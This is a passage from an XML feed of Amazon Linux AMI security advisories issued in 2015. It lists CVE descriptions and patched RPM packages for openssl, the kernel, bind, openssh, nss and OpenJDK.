release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.10-1.115.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-564</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-564: critical priority package update for openssl</title><issued date="2015-07-09 06:15:00" /><updated date="2015-07-09 06:15:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1793:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1793" title="" id="CVE-2015-1793" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-devel" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-10.87.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-10.87.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-10.87.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-10.87.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-10.87.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-10.87.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-10.87.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-10.87.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="10.87.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-10.87.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="10.87.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-10.87.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-565</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-565: medium priority package update for kernel</title><issued date="2015-07-22 10:00:00" /><updated date="2015-09-25 15:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5366:
A flaw was found in the way the Linux kernel's networking implementation handled UDP packets with incorrect checksum values. A remote attacker could potentially use this flaw to trigger an infinite loop in the kernel, resulting in a denial of service on the system, or cause a denial of service in applications using the edge triggered epoll functionality.
1239029:
CVE-2015-5366 CVE-2015-5364 kernel: net: incorrect processing of checksums in UDP implementation
CVE-2015-5364:
A flaw was found in the way the Linux kernel's networking implementation handled UDP packets with incorrect checksum values. A remote attacker could potentially use this flaw to trigger an infinite loop in the kernel, resulting in a denial of service on the system, or cause a denial of service in applications using the edge triggered epoll functionality.
1239029:
CVE-2015-5366 CVE-2015-5364 kernel: net: incorrect processing of checksums in UDP implementation
CVE-2015-3212:
1226442:
CVE-2015-3212 kernel: SCTP race condition allows list corruption and panic from userlevel
CVE-2015-1805:
It was found that the Linux kernel's implementation of vectored pipe read and write functionality did not take into account the I/O vectors that were already processed when retrying after a failed atomic access operation, potentially resulting in memory corruption due to an I/O vector array overrun. A local, unprivileged user could use this flaw to crash the system or, potentially, escalate their privileges on the system.
1202855:
CVE-2015-1805 kernel: pipe: iovec overrun leading to memory corruption
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1805" title="" id="CVE-2015-1805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3212" title="" id="CVE-2015-3212" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5364" title="" id="CVE-2015-5364" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5366" title="" id="CVE-2015-5366" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.48" release="33.39.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.48" release="33.39.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.48" release="33.39.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.48-33.39.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-566</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-566: important priority package update for bind</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4620:
A flaw was found in the way BIND performed DNSSEC validation. An attacker able to make BIND (functioning as a DNS resolver with DNSSEC validation enabled) resolve a name in an attacker-controlled domain could cause named to exit unexpectedly with an assertion failure.
1237258:
CVE-2015-4620 bind: abort DoS caused by uninitialized value use in isselfsigned()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4620" title="" id="CVE-2015-4620" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-devel-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-567</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-567: medium priority package update for 389-ds-base</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3230:
1232096:
CVE-2015-3230 389-ds-base: nsSSL3Ciphers preference not enforced server side (regression)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3230" title="" id="CVE-2015-3230" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-devel" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.3.1-16.42.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.3.1-16.42.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.3.1-16.42.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.3.1-16.42.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.3.1-16.42.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.3.1-16.42.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.3.1-16.42.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.3.1-16.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-568</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-568: medium priority package update for openssh</title><issued date="2015-07-22 
10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5352:
1238231:
CVE-2015-5352 openssh: XSECURITY restrictions bypass under certain conditions in ssh(1)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5352" title="" id="CVE-2015-5352" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.2p2-8.44.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.2p2-8.44.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.2p2-8.44.amzn1.i686.rpm</filename></package><package 
name="pam_ssh_agent_auth" version="0.9.3" release="5.8.44.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.44.amzn1.i686.rpm</filename></package><package name="openssh" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.2p2-8.44.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.2p2-8.44.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.2p2-8.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-569</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-569: medium priority package update for nss nss-util</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4000:
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic.
1223211:
CVE-2015-4000 LOGJAM: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" title="" id="CVE-2015-4000" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1185.html" title="" id="RHSA-2015:1185" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-util-debuginfo" version="3.19.1" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.19.1-1.41.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.19.1" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.19.1-1.41.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.19.1-1.41.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.19.1" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.19.1-1.41.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.19.1-1.41.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.19.1" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.19.1-1.41.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="3.71.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/nss-sysinit-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.19.1-3.71.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.19.1-3.71.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.19.1-3.71.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.19.1-3.71.amzn1.i686.rpm</filename></package><package name="nss" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.19.1-3.71.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.19.1-3.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-570</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-570: critical priority package update for java-1.7.0-openjdk</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4760:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4749:
It was discovered that the JNDI component in OpenJDK did not handle DNS resolutions correctly. An attacker able to trigger such DNS errors could cause a Java application using JNDI to consume memory and CPU time, and possibly block further DNS resolution.
CVE-2015-4748:
A flaw was found in the way the Libraries component of OpenJDK verified Online Certificate Status Protocol (OCSP) responses. An OCSP response with no nextUpdate date specified was incorrectly handled as having unlimited validity, possibly causing a revoked X.509 certificate to be interpreted as valid.
CVE-2015-4733:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4732:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4731:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4000:
A flaw was found in the way the TLS protocol composed the Diffie-Hellman (DH) key exchange. A man-in-the-middle attacker could use this flaw to force the use of weak 512 bit export-grade keys during the key exchange, allowing them to decrypt all traffic.
CVE-2015-2808:
A flaw was found in the RC4 encryption algorithm. When using certain keys for RC4 encryption, an attacker could obtain portions of the plain text from the cipher text without the knowledge of the encryption key.
CVE-2015-2632:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-2628:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-2625:
A flaw was found in the way the JSSE component in OpenJDK performed X.509 certificate identity verification when establishing a TLS/SSL connection to a host identified by an IP address. In certain cases, the certificate was accepted as valid if it was issued for a host name to which the IP address resolves rather than for the IP address.
CVE-2015-2621:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-2601:
It was discovered that the JCE component in OpenJDK failed to use constant time comparisons in multiple cases. An attacker could possibly use these flaws to disclose sensitive information by measuring the time used to perform operations using these non-constant time comparisons.
CVE-2015-2590:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2590" title="" id="CVE-2015-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2601" title="" id="CVE-2015-2601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2621" title="" id="CVE-2015-2621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2625" title="" id="CVE-2015-2625" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2628" title="" id="CVE-2015-2628" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2632" title="" id="CVE-2015-2632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2808" title="" id="CVE-2015-2808" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" title="" id="CVE-2015-4000" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4731" title="" id="CVE-2015-4731" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4732" title="" id="CVE-2015-4732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4733" title="" id="CVE-2015-4733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4748" title="" id="CVE-2015-4748" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4749" title="" id="CVE-2015-4749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4760" title="" id="CVE-2015-4760" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1229.html" title="" id="RHSA-2015:1229" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-demo" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.61.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.61.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.61.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.85-2.6.1.3.61.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.61.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.3.61.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.61.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.61.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.85-2.6.1.3.61.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.61.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-571</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-571: important priority package update for java-1.8.0-openjdk</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4760:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4749:
It was discovered that the JNDI component in OpenJDK did not handle DNS resolutions correctly. An attacker able to trigger such DNS errors could cause a Java application using JNDI to consume memory and CPU time, and possibly block further DNS resolution.
CVE-2015-4748:
